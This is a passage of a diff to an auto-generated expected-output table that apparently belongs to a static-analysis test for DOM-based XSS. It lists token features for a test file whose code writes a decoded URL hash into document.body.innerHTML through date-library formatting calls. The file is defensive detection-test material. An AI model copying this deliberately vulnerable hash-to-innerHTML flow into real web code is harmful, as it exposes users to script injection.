@date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:67 | moment.date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:67 | moment.date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:67 | moment.date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:67 | moment.date | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:67 | moment.date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | exceptional return of moment. ... 06-21") | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | exceptional return of moment. ... 06-21") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | exceptional return of moment. ... 06-21") | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | exceptional return of moment. ... 06-21") | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | exceptional return of moment. ... 06-21") | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | moment. ... 06-21") | CalleeFlexibleAccessPath | moment.addDays | | autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | moment. ... 06-21") | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | moment. ... 06-21") | calleeImports | @date-io/moment | @@ -13280,6 +98846,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | moment. ... 06-21") | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | moment. ... 06-21") | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:57:57:57:81 | moment. ... 06-21") | receiverName | moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:64:57:67 | date | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:64:57:67 | date | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:64:57:67 | date | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:64:57:67 | date | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:64:57:67 | date | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:57:69:57:80 | "2020-06-21" | CalleeFlexibleAccessPath | moment.date | | autogenerated/Xss/DomBasedXss/dates.js:57:69:57:80 | "2020-06-21" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:57:69:57:80 | "2020-06-21" | calleeImports | @date-io/moment | @@ -13298,6 +98869,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:57:84:57:84 | 1 | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:57:84:57:84 | 1 | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:57:84:57:84 | 1 | receiverName | moment | +| autogenerated/Xss/DomBasedXss/dates.js:57:87:57:92 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:57:87:57:92 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:57:87:57:92 | format | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:57:87:57:92 | format | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:57:87:57:92 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:57:94:57:98 | taint | CalleeFlexibleAccessPath | moment.addDays().format | | autogenerated/Xss/DomBasedXss/dates.js:57:94:57:98 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:57:94:57:98 | taint | calleeImports | @date-io/moment | @@ -13306,12 +98882,134 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:57:94:57:98 | taint | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:57:94:57:98 | taint | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:57:94:57:98 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:15 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:15 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:15 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:15 | luxon | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:15 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon = ... apter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon = ... apter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon = ... apter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon = ... apter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:58:11:58:36 | luxon = ... apter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | exceptional return of new LuxonAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | exceptional return of new LuxonAdapter() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | exceptional return of new LuxonAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | exceptional return of new LuxonAdapter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | exceptional return of new LuxonAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | new LuxonAdapter() | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | new LuxonAdapter() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | new LuxonAdapter() | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | new LuxonAdapter() | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:58:19:58:36 | new LuxonAdapter() | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:58:23:58:34 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:58:23:58:34 | LuxonAdapter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:58:23:58:34 | LuxonAdapter | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:58:23:58:34 | LuxonAdapter | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:58:23:58:34 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:12 | document | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:12 | document | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:17 | document.body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:17 | document.body | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:27 | documen ... nerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:27 | documen ... nerHTML | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:87 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:87 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:87 | documen ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:87 | documen ... aint)}` | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:5:59:87 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:14:59:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:14:59:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:14:59:17 | body | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:14:59:17 | body | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:14:59:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:19:59:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:19:59:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:19:59:27 | innerHTML | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:19:59:27 | innerHTML | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:19:59:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:59:31:59:87 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:59:31:59:87 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:59:31:59:87 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:59:31:59:87 | `Time i ... aint)}` | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | | autogenerated/Xss/DomBasedXss/dates.js:59:31:59:87 | `Time i ... aint)}` | enclosingFunctionName | dateio2 | | autogenerated/Xss/DomBasedXss/dates.js:59:31:59:87 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:32:59:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:32:59:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:32:59:39 | Time is | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:32:59:39 | Time is | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:32:59:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:32:59:39 | Time is | stringConcatenatedWith | -endpoint- luxon.endOfDay().toFormat() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:46 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:46 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:46 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:46 | luxon | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:46 | luxon | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:55 | luxon.endOfDay | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:55 | luxon.endOfDay | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:55 | luxon.endOfDay | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:55 | luxon.endOfDay | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:55 | luxon.endOfDay | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | exceptional return of luxon.e ... date()) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | exceptional return of luxon.e ... date()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | exceptional return of luxon.e ... date()) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | exceptional return of luxon.e ... date()) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | exceptional return of luxon.e ... date()) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | luxon.e ... date()) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | luxon.e ... date()) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | luxon.e ... date()) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | luxon.e ... date()) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:69 | luxon.e ... date()) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:78 | luxon.e ... oFormat | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:78 | luxon.e ... oFormat | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:78 | luxon.e ... oFormat | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:78 | luxon.e ... oFormat | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:78 | luxon.e ... oFormat | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | exceptional return of luxon.e ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | exceptional return of luxon.e ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | exceptional return of luxon.e ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | exceptional return of luxon.e ... (taint) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | exceptional return of luxon.e ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | luxon.e ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | luxon.e ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | luxon.e ... (taint) | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | luxon.e ... (taint) | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | luxon.e ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:42:59:85 | luxon.e ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:59:48:59:55 | endOfDay | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:48:59:55 | endOfDay | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:48:59:55 | endOfDay | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:48:59:55 | endOfDay | enclosingFunctionName | dateio2 | +| autogenerated/Xss/DomBasedXss/dates.js:59:48:59:55 | endOfDay | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:61 | luxon | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:61 | luxon | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:61 | luxon | enclosingFunctionBody | taint decodeURIComponent window location hash substring 1 moment MomentAdapter document body innerHTML Time is moment addDays moment date 2020-06-21 1 format taint luxon LuxonAdapter document body innerHTML Time is luxon endOfDay luxon date toFormat taint dayjs DayJSAdapter document body innerHTML Time is dayjs setHours dayjs date 4 format taint | +| autogenerated/Xss/DomBasedXss/dates.js:59:57:59:61 | luxon | enclosingFunctionName | dateio2 | +| 